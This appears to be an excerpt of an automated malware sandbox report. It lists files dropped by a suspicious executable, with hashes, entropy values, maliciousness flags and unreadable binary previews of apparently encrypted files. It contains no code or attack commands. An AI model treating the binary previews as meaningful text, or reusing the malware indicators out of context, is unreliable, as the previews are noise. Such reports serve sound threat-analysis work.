              Preview:regf.Rk'.A+.....h.@.>...H..3..o....P..&.0.}.......J...,....^.g.....\Y..4}..K....d..?.".NS".A..$..it.j.. /}#...,......4dio~.E.'L..#.l.v.....x...R...........,..[...;.:.L.s............vr.g..:b.X.-.j...g0+..R=..v.H.x.)..6..*g,..-h.p8..&....M[kk.Q..J.!.....l..iX.6.N&-.I..E...-.;[..H..e.7+....W9>q..E....+.f...3..{&..w~....7a..&{w..Yh...!........\J.)x_.OA....o.<...k$W.[.eN(...@-....q......5P8....|..M..%?/.m..'..{....>....-l.EB...F...hk.;.$.C....!cr.!.K...!I.&;...k.6).....~V./.+n67.......c..p......?.B.Y.m8.:.i....K..G...J...?A.~.....8W4R..0DA.........u1&!...nM.}.xz:.E^3......q..zw5+D.E..W*. ....C.lx8.W....(N..e0*j.'..(.N..V.Za&.(n.]..Q+).k.W.s?M....A..M....;w...A.r....n.......9A4......m!..*1...R..2.HX6AC.....$...*.e..FP..M.N.2$..G.x.x..(>tWu...c....X...,..Z.-.d.......b..5...l....wV_u.].C...P....A>a.JI..0.f.m..B.{.v.:.N.7.e.!.N...].8h_..<KN....Y...Y..i n..Q..bx.C.Enj...E.....S.IQ1#j..ac.,<;Z..p.SE.A.g...g$....Y..(...._....\..!e..xE....Z...!......~.7
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.975608062282713
              Encrypted:false
              SSDEEP:192:2ePWr11L7XM8Qc433+lhCcDpyNpb+U+gB/aFTbQ1jIhG0QGW:R+BJ3sOlEwyNpbUgRqTcIhG0Y
              MD5:F72042F5A5A4619E24500A097471C534
              SHA1:F09B38A3A6F96100F4D003EFB7FAC47139557296
              SHA-256:CB7A6B295C7DFB17AA6D91D1BAEE8740464265FC13383001EA0DC31C8EAA18C1
              SHA-512:066CE4BA79FA53869471BABB394DE45B5972300FD8BD9FF700BE3E40F336D681B759529F7548D4EC2BB9779D25DAAD9A3EAC583EB516AB00F49F3B0C8618E4B2
              Malicious:false
              Preview:regf..|......^..b.~&.n.}.3..._@..cn..]..t=F....v.+i.....j#............^_>..I..vJ.EGa.)..Xu...\.e.....A....t.d.K.<.u.o...>..K..=..m.%..s^~=:.oR....}........r.@0...`.....Jl.h_Z-.....=.`MQ....b.y.nDk.....G.1...!D.:...f.|..3.HM..D`.<.D'.Y.B...O.h...{b..MF....{C......Y:O?.....g....&.t".5.%..`-..*7...f.>.i=....=D....'`.+!.8A:).Oi..K{.....0%........*.....n.f).t.E:....l......Y......n^.W. g...Qr`...yBv......6..E...K. .)....>5..5....V.h....[..4.x....A.mEh..gVv..\2s....*].*.X*.+.q\...~..M!..N..s.....y..T...6.5..X...h........x.".]j].}....}U.3%R......o...L>6...h.).01.zZ0..N..z.Kc.....<.).-....\K.(.r..Cj...BXu.......d2".....o.i..n^5....$.G.ZO*.*.E....&E.............l......c...2...8.d.....0.,d..`7...,"6..+.....'x.V.X....j2.B....dd..o...B..B.....R[v.Q?....I..R....$.L......Bi..~.k...1..A.i.Ug..7.Z*..v....F.......AP..~p...l5P.z_~...).9?..5...&.c...^.N....C.....r..&...G.?.........{<....q...!.<h..lH...h@?.4g...K\......9.].AQE..k....\.;......>..Z.8;..)..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980853201675794
              Encrypted:false
              SSDEEP:192:IRdhSsBOWnBjKKVxJwAGuOzwI/VU0ToXbw6gEW9A9izdjV47:IRfFBD3VrwAGuO8t0TCb69dzhV47
              MD5:0FB3BFBA51F966514ED9B12C5A68B766
              SHA1:4B93B9241B6214FB28A2B44F11B95990950F0E0C
              SHA-256:62B3FE7059EEC8E20D28DD5BB1E7AEC20B98F5B61F01F08CCF00018D6C194496
              SHA-512:83A1E3A8D9409E9B3A91616EB49F8577CA8955217B510B74F974A1171EC2A3CAEFE40E6E8B50F242EC64246991885BDDB4713B51F7394E72AC85A316E7476541
              Malicious:false
              Preview:regf.d....B!....._..-Z.h...O..I.p.....x....#Y."..^.i!d...HqI>..J...`e...EH...8.[.......h....C...U..T,.eRF....1.\......Mv.'C..hy.a....@.v...m .f...<..r61..a...?..q8].E.h..&6..Q.\.1...(%....k......Q;..S...ud+N.j,l.Y=.."...>...c.#....bO..n;8(.9....'S.BR..{....W.a....0...(....P..`.I.j<y=1.d..Kp....b]...xQ.......=Q.T..J-..m#..%j.....6.PDk..3.h...1"B.x. .%M.....o...b>.*..Q.6...4e^..(7:..V..o%.......U.=r........F...2.t..QO..u.....\9)?D..........K.K+".5....HD..D#:.M..F.o...&k...23...\P.K..."...Wf..N...=.X.js.$......n.G\X.<...J$........aC..W'..-@..h.X.J..E...sp......L._*6...a.D..._..."..by3..C+....!g....Z...`)..|s..D.YW......"O\O...4.}_.C...s.p...$.S`.....+Cs...U.B,w.............l>c...S....K......9.M$....se..m=...R.m...38...Xc...L... ...]..? .Z3[g....t.OR.......S.x.J.3.....fol.7.[......En.=\.&......b.^.h..~+..d...D-.......3MS5.r..y..........a:....8..MR.b.oI...w%)v.......L..{... LL..O.]...2.Q..... .1..P....U..;Y@R(......^}..F....i...GH..V.R.H)m
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977800213842693
              Encrypted:false
              SSDEEP:192:idVYUrPVEcFdeBKrItQ1SP/w4ThrVlkAl+DSWKnn:ibYqPekys4TXmAUDdKn
              MD5:70388AC49A64FFC061EB19E95D7E0688
              SHA1:748320DC3A99C8F468224346EBE34F303970EB42
              SHA-256:FAE49B78ACF84E0E2D9EB1B9DAC4D62B6765B187128BB8BDC23A47F7CB7AF797
              SHA-512:70F44B7E5F864EF0AF751474D91F74959E4AA9937B14EEF83AAB92FAAF71E0FEE806FBCEDFC01A7E5C3C67151171C2EFA64971BA27EE0511FDD5B57492FE560E
              Malicious:false
              Preview:regf..h....t....s...9....7.O.........'u.6n...<.w|.....+...'..;...r!k..`..4..v+..o..X.?..c.QfF..j."t.t-.i..e.u.f.)?m.v..-..X..v.o.7QC.....,P...|`..?.?.s.i..F...f.k.u..u....s..Y.M...jJ..M.I...H.....4q\........<}3.Tb.G.\Y...r.....A..~<._..F...J.j..-+.t.........)..P3....;#..h...P.hT...C.p...rf.}...C............*...E.."..TO....nm...p.L.3P....Z'VI.F&*...m...H.JG"...?...2!%(......W...C..).(.......'.....b.....I.E8....N[T....+.gu.k..6=.d...f....:.....~.q.....p.b.w...L..#f...\..d.4.^.*... ...R;.@0.1...r..m&K...[..../`.+.C..j....P..[..z^.g....s...|...}3..h......x..jA.kY.*..A..b.%......4xk...|...s..H.5.AZ...{..b..^..}0..1......n....O.P<..."dI............s.%[....1^..J.>=cb...Og.g)..t:...c.Z..@.)`..q...Q..(../-....m.8P.B....".c.....SP..vYr.}.zd....>.......|..fw}...v.VH.qP..w.v.X....Rj,e...Qe4. .`.(....Y.7Q.fhZ.}.N..0.o.Ze.S.lc..E....7......%&..s.e.....5.gl.!.{...$..s..k.zVnj.m....0fM....m&.'..U.,.p6I...-...J.&.o.~vY`..D.:.8.>._.A..m;.,..":.Vw.\.....g..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980668885716245
              Encrypted:false
              SSDEEP:192:MZkN2xnX1FTWvxsAGifgXlm7pi7W4js/Pl3sc5k0jarhz5:Ms2xnX1F6DGfXQ7pi7Jstsc54rZ5
              MD5:26E1B5C441F2292001C362233FF7286A
              SHA1:5B47C4B06418075388A2C680F13A5E7A77689D6F
              SHA-256:F9E9DDCB155A57F3630956EE84A5F210BDED9AB25DA7FBCE1ADE6388C7C88EDE
              SHA-512:2AB2153215C92494FAF7B62A9EC3FC68F6D42072FED6A02E06C5CADA3B6D68E765813D61D5DE3EBBF120864EDFC8B173FE7D20C4AA166AEF30864E6A3BAA544C
              Malicious:false
              Preview:regf.2.N5pc...d..|c.[i.\..3.../_"i.!...ArZ...W..nM...[......<6..<.m...Z..c..L.=V..(......-Z.7......].P..A..s....Y.2..^,.0...K..c..b...v.V.Gd..x6^.5....?&..@.^..I3..1P.~.7...V...,.' Q..s$.........-..S.3...3.yB].P_j...V.ZU;Y...P...K.)~Pn.SP......Ytt..*...8..gq_..d4r.....e.~r.`r.].4..?.....h.......;.>..{....}.V....Y#...W..i...o...uqI.w.kg..!.`w-.;...N..D...).....e,...ND..(P...s.9.GgX...g..%...._.....yZ&=%...$._.....=7...#.....6.....^~........C.....v.^.J..y&.!B....n[....z..$...a/'$y.p..e..@...|.w.?,).>r8V.<.......e.y..D.vS...>..'...H0..k....]o.:;..73$.b..52oz.3.a..........m...-.......}..0r.....Z4!....9[.V.VP{...M...F...x....c=.5.a.P.:.yS...F..\.......w.."N...P.?.=.^.#..Y..Y.....9...+?....sz.?s..{..I>.H'..7.:..r...(+....y.0H.K.O..<k......?.....@."?.K.=....X...e/<...@....4.O.....C\L.x..l"E.(.........)..-B....T#.9..0/...\.L..nr.....* ..^a.u...N....n@.....wQO.?K.upHx...oO e...I.........$.oGT......hY..K.G.C.......3..F...c0...fj..`6...I...J.?.~.x..U*.>
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.98166783863078
              Encrypted:false
              SSDEEP:192:oNUesVVns4KJOw+LVR5EvOCvMwXtFK5H+CpwlNpDLHCjprLTuOe964:D/VVn9KJz+qvxhweMEtLmp7u3j
              MD5:1493C709F967CEB2E0419B2F88DC6412
              SHA1:28FE78F5DB832F0678CF8A192A4302549E988939
              SHA-256:2EFEC25DB988F189C7AC5B3FDF94D4014C8FB0B12EAB885018F93F695DF3C0E1
              SHA-512:9DBBBD08106D2DCE2A31688909FD0815A449EB9D92D6B6E3CD836CA8A80DF6AF87E2DEFBC380945AFB633B2C4D2E54B5AC5E13D30113977C4A74AEA6B785422F
              Malicious:false
              Preview:regf...cn.o......n..?..^\E.Zb.;14.._.......'bL6l.}+..m+R.a...Y9...7c..9+T...m.d..>.....Q.HH.SO.8....k..d.AB.|..K...w3/......6.fs._}w..O.z[X..X...0n.....N.0..'d.../.....X...Y.)..25..2..B3.5I.../(..KZ%u.>....s.v.X!..j..'...E.......%........q............7_.&..4..V.fd.>KO.U..V..W3...v...<.K#.......>/'.H....3..Q.?......Qr.MK6.....tR7....]dz...R4_...?....:....!s...._.4,.#..Nv.......P.Fm....|.Y,.-...R..^..<I.PG.......Zh6.Q\....[.q2...$........1....@.@... ....D.q]..uN..nI...D.5....Qu.9d..Y.).G...p.)K.......#..{.........G.UI..=O...c..XHJ.-._r..84.G......n_R.Q.g.....x.#.....M..>..u.."......e...9..E.p.w]...3...Z..Yb...{...F..6).g.ns...P<.:u$.6..7)q...%c.........8...W.C...S.0\...?..W..^4~..._.Fp....3a...].5).i.).k....D....uV.Y..$i.*...D.2.V ..^.;..~....<..._.0.S.[..}......"..z....:.:.A.P$(.Y...b......1..._..]'i....|9...>......G...DO.D}n..#.:.X.O....d.=Au.:4j.l..'W-......P[.`...6G...s.d.Gm....=.G.6..PP..!.@:..6-..zg{.cke..?..e._.E...{..j.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4430
              Entropy (8bit):7.954206931146919
              Encrypted:false
              SSDEEP:96:iBIJixtOo/3MZepSzsq5R890Ni36C1z+YHy4yEU/t/VoHKr8m03LC1Aw+lp67bcE:itxtJffS4qI9h6C1yI4V/UKR0baD+bSV
              MD5:7DAE9486240384C5D27D24408C9E034D
              SHA1:7AD43AEED841B3D510E18CB2974798BCCD29406E
              SHA-256:489FD12185C8B9B827BC28A0595DAC9541AE2EA5E2EC872517DD9706F75751B4
              SHA-512:2EADB2DA61AA607571B0CE27FA8741176383BAE9A7826B65C12AF86D3F8EFD534CEF88725BBC5C6FC96FC5D4FBF2F455C67D0C38DEC68F29504CB3BFBCED4FCD
              Malicious:true
              Preview:SQLit...6.p.....F.i%..w.x{Jg..0.......W....@...'......s.L...r...........WMhvo..ODz9.m...u.....sJ.+).......%......M.@....W.I.4.F.V.*.6`....V{.....[g.c..../B....`..hOn.....z..=.kd...../.'.,...+..2{...PV.U...R.mZ}......5qf?%..:V.....\h.y1..QA#.].......H PL..?.&(.g..T....-[nH...i;..1....E.7b.6W.......>.T.=.c>qK...|kq.qV.c9...x..I.F.>u..-..y..F.....#...7.GB..$3#a.l.]}..........?.Ef...J..w...:C..~.T......=....T....$..9N$m._QgCJW..@.............D+.n...Ps.9Y.'VV..9..5...7.....2.....Q....#{..x.zF(Z<%.AK.h0.|.1.....G&.z..V...S....E...eh.......p.'..b....*...s....K<r.0b..#?xy......+L5.p...7.r..A.>`......5,..q.f.e..Gm....u...a.e.....o......3|.s.!..n....}.e.RF{.{.}......\".S[."L.. ...q.).s6..e...M..k.....0T5)........u..r.E.{~.....q......E]...,...&<..-S0.m..s`.~.1}. pR....y..V..........@&....OO3.u.......h.K........K.fx-.R.T..hYG.:.. .s...\..Bp...,.'*M|.u.....w.cX2...,..iD}...M.#-...:tw%/+......A.g........49...#.a&......8....SZ6pj.u3'
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):33102
              Entropy (8bit):7.994393034005228
              Encrypted:true
              SSDEEP:768:irPDzUSW/5ru6AThUvY9RjNClrEMSOOG2HwzLiQNVKR1QwTc:2P0SU9uVT2vkj85EMSO4HS9ic
              MD5:62D946B0439AD7DD01B60643C157365D
              SHA1:79352B22211F213B9233805073211FFF74440EBD
              SHA-256:4D1590B3197B59B1355B88F1039FBDA8879625610AB85065E2014F9ADD91FD7C
              SHA-512:8407042F2F1437D268E1876AC2A30F305CB428F5DF4E98EA35E3C90FF6ADF08ADD2446E55715E4ADDE403C45E3A8E67E8CECD28CC3E2D295D5524FD0BFE27487
              Malicious:true
              Preview:..-....-pI..0c]P.T....7...kt.......0g..QS.B.d.M.....N....x.u...w.c*.I..........L.e.*>..w...W...7q........"...P.......$.+sy..+.{.v.0.....v...t>#..h...4.WF.vn...}...Q..A...G.x.O.rsh..l.Z.2.....K.......|..SCO.e.0.=q$...._.GN....8.....D..D.N.....3uF!.. .....h..H.A.n..H@..HL.,.G......_.x.........J.B.r....p...^^.._...mE..Zy.....AW:.O.4...C.aXp...x.^o....Y.<BN.G.9.A.......~.ey.m .`V{Si8..zp..2-..XTp...M.H.'^.u)..4R...'....v./.s.?..Z.:..k..\..]X%.#....:._4......:l!.q.<...J.h.bI..)+..9.Gd..c.q..S.WvQ.2[...}9_.).(k..b }j .Al...-...{..L....X.,$..B.#........*X...N..T{.e..,~.S[..:3."..................._(.....Y.....l.,.B.|-...~..&.w.xx..%T.....q...R.Y....Dp......$.e.f.I..V....m..0n.*".\.5..C.N]..*...w.3y^.3.K...9..+..w.)...<V.R.T..(34....$+_.....<.a...~#8..;..d.......!I.j.9.........&q]...+S..|f..u...Y.R0S.>...y.q.V.b}.Q..ZR.s;mxR.br.w..<..7wP........?/e.......c.. ...P...7.,E.<.:Sv.^.. ..Hr#1b..6.C.J..".k.ic..!.C....h|..qj.(S.\..p.....j.F.....X...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:SQLite Write-Ahead Log, version 7819665
              Category:dropped
              Size (bytes):1347606
              Entropy (8bit):1.9808970541783617
              Encrypted:false
              SSDEEP:3072:bbP9uVLC94s4V5WbeDfzWsk+OaAl7p90gv4IOPH+HZYzlwOuY5h+olR9FEeI0mGk:bbPj94F30kAl0gyyYJb7+
              MD5:1864141B186E0A47ECA93884368F8FF5
              SHA1:96D1673FB4AAE3D98034B52D35FC73D80B9BDE9D
              SHA-256:91F21B7AC0CB64AA44D5D101849CAF4CC115E8A49F8D7916CF2EEE22C7A112C5
              SHA-512:884DBA3B8AFA4FEFCEF5E6A2D491703E6A8E627815AC7487C3F8A9109F8B9586F0F9A914A7BD987ED338AF1BA19A04914B8FFD534CEE0D0CEE373D7C2058280A
              Malicious:false
              Preview:7....wQ..;...b..B....Fl.w...{..jQ..3..b...K..:`.0Q....km.....f).Z.{.d....$..&....JdO.8h.qg.o/ZK.J?@..W...#P.7.\opy...4.0s(...7...Z."b....0.....@0.d...q..6i..k.....5..C...C"9L..fj...=b..+..........z..g./..p..Q.F......D..v.'......Q.p..u.?..N.....c.c8.. c...Y9.....0/..w..$!..@.yk.M...l+06....<.~:...~.5.R.z.I......n....Xd..Yk7.c...2.....`]1N.{..p..[.aa....+..U4.....y..E..f...,).<A....M....K.6..C.;. 4..P4^....-=c..?..Z.....MGaj...H^a..s.-.aMo...R9}V.{SX0......;J........].y...G...vSF...\j.4.i7.....+..Fj7........Q...I..Z..G~..Z...?5...O.|..+....9WL..LD-....4...].|....p..B]...3..Bw-Y......;..3.l...3..*.u...:p.U....M.#......k-......+....L...u..E.[;g$.P..#O..S.rZ.[c....|+........y...I.&.-.....q.h-6...>. J ....(..$..L......'.lX..#.e$E'.%.2J.Qf...q....X.<."......>.c..Ce4......._..~X.R,.+c..._..9...h.S7.l5...8....T.6d.....4..-.2..4]z.C$.a.1~.....l.....lK.&...-.....jm .......6.v..KT..0*:.k..".9.T.RT...0..@O..m6..m..3.z..._.1.q.Z...O.=r..../.|.n....b....$.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):65870
              Entropy (8bit):7.997579285634312
              Encrypted:true
              SSDEEP:1536:K6Sxa7Dg+FdXMKS9oiPx++dX4xVyKMyFb4gnS17vN531gumLr7cjMW:P7Dg+cHPx94xAyFsgS1zN531PAPW
              MD5:D1E3E3B2EF1CFBB8B8D800EBE089566D
              SHA1:2F30BF09E67A06074FC303FBACBF9E8D8ADDA86B
              SHA-256:918863610D515F938A9D3BC9BFFFA2BAE95C5C211B45384922E09D0308276E8B
              SHA-512:10112C3CDE20E2F33C5E4743A54EEAFC3968B024E081E60CFC9A5497E8CC7025A3CC30AC8C0248AE244AF516F291E28EF83B4D00A0F5C63310786B03B2133438
              Malicious:true
              Preview:.......o1&.......o.:.......'^...z.Q....9Kl.....oX...r..hL.7.F..._....$..o.[>..R..7......Y.M..1Crf..&.QE.kh...X69..U..p..?p.n.C...?....9Q...a.u..BK......B.Prl.....+SC:.?....K}&.y.........c..U!.s. ....2E.......v.7....C~...6.lvt....Ss`Q.].M..&.^.w.iA.t\...M...w._..._&.^..%...TR.t.[..T..,r..X..(.FQ}...Rp=.5..'...&@A3....(.H.yi..B...n..4.vy.v..Q...S.+..$..*......8\....^d.8.{.q.......}N.EFi.nIZs.)..CrY..../.k..q.......z.Bc.9.5/.......\.q.w`|...o.i2....8...g.&D1....K..j....f4....[.e.....`.,..Q...wg.<.b.a.G_.F..f..>;...q..H..+.$.&...g...D..1....m-.H.....\k..A........ .n.J.....1...ev6...@?.....B...i...p..;1x........D.u.}.;.........Q.Fo....a..;...5pg.{.H.w.m..~...H.......`.5.4..B.8...4S.'.b......1[.[W.L^UI._[.d.n..|ta".Ts8..+...../N....R.p..'c/*=p.5.......Q..@....D...C.....-.,.....U...;AIfU.P.sX,VB..r....7..m.7..P..d..s..~]...H..)..7I^2.\...(..|&...g ..IJs.Y...zv.[u..\O........"t.....\2r...#.6...."...$..H..Mk.@.e..%C.F...9.N.......=e..N...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981005478153391
              Encrypted:false
              SSDEEP:192:TOnMm2yAMDWtj0NA/7hPVCqODjj4Sm+q/X6DRgGh1U0nCG:TGj2+9mdVCnj4SmN/6DaGh1UYb
              MD5:E49B46FF9632359358AF4D9B047BE999
              SHA1:68383CD4F27402471D6CE79761DCAA07391ACBD7
              SHA-256:1B3FD034547A64D5799AB4BD3AC2A8D5442117A9050D801561CFF4BF9AC8B339
              SHA-512:D9E829A20FD04220B9425D8565C0D14FECC266E96F134F307390764B05E4E3801ABEF43AEAB6FB1AA6652E8B27B01D767DC051806EEC0E709FB1A38075398D43
              Malicious:false
              Preview:regf....0o.....W........7v.]..t....|....<..p. &..."..b6.".C.g.x....L.F..6xw.A..V.^..8.0..z...r..R...|L..|.B....6..N.).`...m,...-....../.=....}....7......*.....f...pvH.+...-w../..T.2..);.PnZ2...C.y.pd9..'..q.Azz..z..l. 8_.IY.R..F...ye..3.X..*&....*....E...Gl&z........l,.:..).0.X......Sb.v.!....9..5.&..v8....D..l*.M..Fz.e..dkE.-.%..../.Rc..!.P...P_...OH?...Cs..k.]K.R.q...L... ...C`7...U.~.G...#.mXM....F$2^Z.....'.!..:..7...#....`....+...2].....K.N....wG]....-..Gq.<.!i....(....,l....0.Bw.r.=.......p...N..W.I.3....K..`{u..^.m.`7...)~.;..8..o.4..L...8.>O.x.HE...'..:.W..=..4....$......57.7...T........6..?.;...N>..4MX3.`...=Q&".&u..S............<..ARG..&W..#...08.r......gb..JG.^l.(-..I..|.....S9..P.....P...VU.(@...5].:n..y....D.`!.H.-f......T..s.*...WfUm=0.................ste}o8ac.........L...{K..8(..|.]p.6U_z....E..../z.V.(...F.Z........Ml.z=.g.....r..s..............d.......x.2.3u.z.;V...u..>.W.L.."...T..;.6.5er.<..Q.U.h'[.5tB...`j....d.S4.ZH..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976804894913764
              Encrypted:false
              SSDEEP:192:Bh+JP5xMG0qddEAcacZ87PeAkCAu3AdfZH8zzypILrP1:mJP5CWEAty87P3kCAu3AdRpaLj1
              MD5:5EDD64FCD7024BA1D9DCCFCEFCDA4D67
              SHA1:0171340D46041688CAB3CC3A36B1087F591FC107
              SHA-256:7EAEC52E2F11AED3719AE2B940975C57761A41F2EDBFF62C51B1504ED54EC52B
              SHA-512:B72A284300E06672FE903B2A8F8FA4E050412C7729CD25994D3E51EBB99CF7B637D99671CF46DDF4571BFFECD20ED46279647EE7E89AB9C07295503219530108
              Malicious:false
              Preview:regf....i...@3u:&...U..F2...p.....(.DMJ6.w .$o,...`...k....r.......y)....f.J...e.B......iD...V..{.b..H..*>..A@u.Y....v.......x5.?H.#....P.*.........X....S=.._6S...."..h y., .....c.b.`.9n.:.V....j.R.}@..$..r9wt...x.....[..R....6n.D.u..G?...h...H..'aB.r..Ux.e....+.vf.m....p.."..&._!!x...L.>.9K..r.'1.w...%...P..S..!.5.m}...z....J...F.d!W..z~...h..,.>Hdl.F.j3.\../].!.b....P.7....{..N^.l..D..=.Z..YE.f..$@...2ng.Bm..h,.z[..0]..f...\>.T.6d.....ug .&.y.b......S!<]..$B.GR./....%-..6..?..B..8.).......L.U4...8F.c.'V....75.P..co.U.n.a..W.]n.X.z....i..S....'...V..(~...~."..\~".=.p-J&;..SA..f.i.q....dN.1.._...z:&...Gy}.m..-.=J.7e...$...N...w....n."...`...(/M..Z..'....4&..v@...G...`.....>&;.$.....;.m...Q...Q$.........ml.j.-...J`..~".....XE..:.....1..Q>...8h....I;C...M<.Q1Ake...Vb..o.S..IA... ..]..K.....$.2.k.*..4r......d]....(....y..!.a....M ....q.4/....P....X..EL_".W..|...;.C.U@......{t/...F8dZ.9.g(..!..E....}..:z.%..j...%...$...2......{W8+F.aS
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.981215358358529
              Encrypted:false
              SSDEEP:192:WXn7Tme4timxV6cI9twykcoSqfzcP7mTssXuHqjuWQcB:WXzSvxU7ZKrC7gseuKjnB
              MD5:0A8BC9BB3448EA1DE5CEFDEBA82D6C9B
              SHA1:C84B80F7ED1BB728F4E6E86D6DE7DAC349F2A462
              SHA-256:5ED858D88752749B54484F4F01811FE4CEF6CB48DDAFADE02E274397F9BF8FC1
              SHA-512:EA960E3B31D2C26651D55E24EA7A49DAC728A4ECD3D01BE33CEDDB7ABAD599CA3972894596054EF228DF5F81BE84A4FADBB57067D2F051C883FB77731C589C45
              Malicious:false
              Preview:regf.9.....k@.b ^~[B.e........2`.."....@[.....RP..{..k7...P..._.[.7F.v.NPRD.A z..9z..Aj.....E..k.d.....%.z..........U|......s....o..EF$.H|.Zz...~.S....X....%.O.A_..?..q.../.b...Of.....e..........v.t(?!;.eq...O.h.u.r..{RIx,.......+.m.~.H.....]....!.Bg.p6!..U.l..a}#w.B...6"...X.t.|k.f1[.!6.`.]}.*WL.5.}.+?0BS.Yb.g.w......H~Mp...KO...}^....b~l.y]7G...%$...eY.....GNLs...[.V.ER....=..YkY*.i.$.....o.RRq."M...+.iCO,...W.?.~JU......d.pyd?...f...b>/......}.H...ts.&_Y.Z..I....K..!T%tlU...EE%x.=,2../7H.\.t#F.vck".0..d*.#x8y.....0.P....{.M..uV.0.o..,[.XC.......:.T..i.......jz.H.)&(..+>.U|....H.....[,^....F.q}.F...e.)s F.se.....$}..._'..G....4h.%.c.9.x...Q.&.....8.<t..W.........^...&.......:.Ywh.Z.+...1w:..f.bIu]...Z.%px.N+j6........+.aW..r....!m.........s..K.J.C*.....Z.j..@.....'..q.P.d.a......3.N."7......\.u-..)z.s...;\..s3.p.r.!<./.\..\.I..B.2...dd...~..j0i..$.&#P8....K...m[...0.:...F.te..N...eB.@o...I4..8....:...}..`X.!`...E..N.z(.d.'....D9..>......f.Z.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):14817
              Entropy (8bit):7.986360781281422
              Encrypted:false
              SSDEEP:384:1R7GWTR9y5V+Qf9Zmt9Ae2mGUmAkV7KQV8p5ufX:19GiMVB9ZUl2hUmkruP
              MD5:D4B2687039D9CCDFC9B29D2D6C632D99
              SHA1:6636A26A154C16792F7F0019DFDCCC86CCA46F83
              SHA-256:957831DD56188045D92F3F6A539D6EA4D41074301183FB393F6757DD5EDFAA54
              SHA-512:6EE5DA7F4591C72AD30EB38B1935506E8589023EF672F8F8E841344CC2AED0249B26E35DEF77920175A5886F82AC87ECD46E62BC10D797510DDAE607FDB8AA1A
              Malicious:false
              Preview:.PNG...3...0..4.....Q.2,q.k/.......^...rc..9..u.^$..Q.};.....8..'..".^....'$..3.a......r....j1.yA....Z.tD``......5....@..erNAR2C-...h...O....U.x..J.<#.58.F..I.r..?>..e0....Z6..hh.K.*...W..z,4......%..r..T.....IF(.....^..-|d+..y........^.@.....y..=.G...O..s.Fn.J..}O..C.}H7..Z...........V+..Rhjm.q8.2&1..V.1....d.ph+.>.WQ.oD.....*>.z...5..2}..g.................1.&.+..Y&j.......h./N81....E...m....v6............R....'.....[[..v...ql$I..Q.&...e..&..3.....H.A..w.1wl..^..e(A8..Lz..M..........}.d\j&.K..0......{..9.5.1coV`c....</3GTR....>M).5 .m......W/Y..-....I.rJR.....tBb...<p."".;2....m..f.^J.q.....B.aJg..^.Y..w,Q{R.B.......:2x.Wj..$P....o.@.....r..R...P.......l..TG...P.c....Amqv..h........^.T..q.NW..<. ..1.H^N..gy.G.}.).?.....l....(............9uRB..K?..6<C@.-......S\.~I.6..R....p.H........VRq.5.>t.8O.pk..+.9`................-..lZ..@......?..*..'Q..g...V..,..Y..{.....K0>..x3..#.+...?....}Xp2C.9.8..:tp.c...........#.h[...Jz..S|....,.O"R.&mI..Y.e
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:GIF image data, version 89a, 2698 x
              Category:dropped
              Size (bytes):377
              Entropy (8bit):7.275316230836973
              Encrypted:false
              SSDEEP:6:NxZPwr0Ahev3tuZRShAxmh4PtwYxnU8jQFKRipvR/a7R0s3ukIcii96Z:Nx7aeftMRShGFwcrj4rvR/a7RvukIciD
              MD5:0B974015831A578BD51A2D2DB9ABD497
              SHA1:869A99FF4AC4538C341B46DCF86BA70AD86B88E6
              SHA-256:D3DDFD25A662693D1AEA85461DAA12F972768C9020B03F359B9D247F266C0132
              SHA-512:5FC411B8127C486F9ED7B6EF919206DCA91AD7BD891F28E0B8BE12571AA57A52B31E3307342B6FF80A997072861F544B914C11BABC0F23F6EBD7DE39AF187385
              Malicious:false
              Preview:GIF89a.....D..y.T..G...P..#Zs.G.5.......m..d..d409 3",.4c......zeW..e*.Y.K.F....'..9.......T...U..t3...v.z...Z.._p.pfTv;Ws.`......@....<..S{..G...5)C.0-.N.....j...?P...?....\p..U..~.c...K.t.......TB.5#.....S.|5.4}oI.Z;...+{;....u.N.s...T.4ry....m..{...;S.BP.8...t......%.Q.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:GIF image data 13702 x 31928
              Category:dropped
              Size (bytes):377
              Entropy (8bit):7.356553489511866
              Encrypted:false
              SSDEEP:6:pBmZrJ/6FPRSYaRbfLwFBjTecpjmLoxJC7C3DAB+b7rq3bO+QXGrvAZ3ukIcii9a:poVxMPR69TwFBjioPLAAPMbNO8wukIcq
              MD5:367BBEE35CDAE6BA21D2AEF47581A96E
              SHA1:01A42780D6C0659DF55267E66E93EF00E209B9C1
              SHA-256:6CCD72D99D08B31CC6A7E290F706E631C2CE738DD54D2C63FC63443C72A1B8F0
